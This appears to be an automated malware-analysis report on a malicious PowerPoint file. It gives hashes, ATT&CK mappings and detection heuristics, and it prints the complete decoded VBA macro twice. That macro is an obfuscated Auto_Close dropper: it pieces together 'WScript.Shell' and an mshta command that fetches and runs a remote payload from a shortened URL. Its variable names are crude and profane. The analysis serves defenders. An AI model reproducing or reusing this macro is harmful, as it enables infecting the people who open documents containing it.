Office (OLE) / .PPT malware analysis — malicious · 0ae4bb2ac7566fb1

MALICIOUS

Office (OLE) / .PPT

71.0 KB Created: 2020-08-09 23:10:45 Authoring application: Microsoft Office PowerPoint First seen: 2026-05-13

MD5: b4788f05015209ab039cd339fd2562de SHA-1: b1c5c2dc5fcccb17ea023866287f95e7cc5ae24d SHA-256: 0ae4bb2ac7566fb16d4b476a21bb8c973812a3cd0f34cea1a7087911905152e8

108 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

The VBA macros in this PowerPoint file contain obfuscated strings that, when concatenated, form the string 'WScript.Shell'. The Auto_Close macro then calls a function that uses CreateObject to instantiate this object and execute the concatenated string 'mshta http://@@@@@j.mp/567sadghada5agdha'. This indicates the macro is designed to download and execute a second-stage payload from the provided URL.

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Auto_Close()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1598 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1598 bytes
SHA-256: `ecd0037a17c215b62647734fa82db9677f873cdaa56002f2c8fd601f837c262b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ab1" Function suckmydickfornoreason11() suckmydickfornoreason6 = "h" suckmydickfornoreason7 = "t" suckmydickfornoreason8 = "t" suckmydickfornoreason9 = "p://%40%40%40%40@j.mp/567sadghada5agdha" antivirusarescam_6 = suckmydickfornoreason6 antivirusarescam_7 = suckmydickfornoreason7 antivirusarescam_8 = suckmydickfornoreason8 antivirusarescam_9 = suckmydickfornoreason9 suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9 End Function Attribute VB_Name = "ab2" Function suckmydickfornoreason10() suckmydickfornoreason1 = "m" suckmydickfornoreason2 = "s" suckmydickfornoreason3 = "h" suckmydickfornoreason4 = "t" suckmydickfornoreason5 = "a " antivirusarescam_1 = suckmydickfornoreason1 antivirusarescam_2 = suckmydickfornoreason2 antivirusarescam_3 = suckmydickfornoreason3 antivirusarescam_4 = suckmydickfornoreason4 antivirusarescam_5 = suckmydickfornoreason5 suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5 End Function Attribute VB_Name = "final" Function yari1() CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11 End Function Attribute VB_Name = "main" Sub _ Auto_Close() yari1 End Sub Attribute VB_Name = "po1" Function hireme() thisis = "WScr" your = "ipt." fucking = "She" security = "ll" iamhere = thisis totellyou = your yoursecurity = fucking sucks = security hireme = iamhere + totellyou + yoursecurity + sucks End Function

SHA-256: ecd0037a17c215b62647734fa82db9677f873cdaa56002f2c8fd601f837c262b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ab1"
Function suckmydickfornoreason11()
suckmydickfornoreason6 = "h"
suckmydickfornoreason7 = "t"
suckmydickfornoreason8 = "t"
suckmydickfornoreason9 = "p://%40%40%40%40@j.mp/567sadghada5agdha"
antivirusarescam_6 = suckmydickfornoreason6
antivirusarescam_7 = suckmydickfornoreason7
antivirusarescam_8 = suckmydickfornoreason8
antivirusarescam_9 = suckmydickfornoreason9

suckmydickfornoreason11 = antivirusarescam_6 + antivirusarescam_7 + antivirusarescam_8 + antivirusarescam_9
End Function




Attribute VB_Name = "ab2"
Function suckmydickfornoreason10()
suckmydickfornoreason1 = "m"
suckmydickfornoreason2 = "s"
suckmydickfornoreason3 = "h"
suckmydickfornoreason4 = "t"
suckmydickfornoreason5 = "a "
antivirusarescam_1 = suckmydickfornoreason1
antivirusarescam_2 = suckmydickfornoreason2
antivirusarescam_3 = suckmydickfornoreason3
antivirusarescam_4 = suckmydickfornoreason4
antivirusarescam_5 = suckmydickfornoreason5


suckmydickfornoreason10 = antivirusarescam_1 + antivirusarescam_2 + antivirusarescam_3 + antivirusarescam_4 + antivirusarescam_5

End Function



Attribute VB_Name = "final"
Function yari1()
CreateObject(hireme).Exec suckmydickfornoreason10 + suckmydickfornoreason11
End Function

Attribute VB_Name = "main"
Sub _
Auto_Close()
yari1
End Sub

Attribute VB_Name = "po1"
Function hireme()
thisis = "WScr"
your = "ipt."
fucking = "She"
security = "ll"
iamhere = thisis
totellyou = your
yoursecurity = fucking
sucks = security
hireme = iamhere + totellyou + yoursecurity + sucks
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.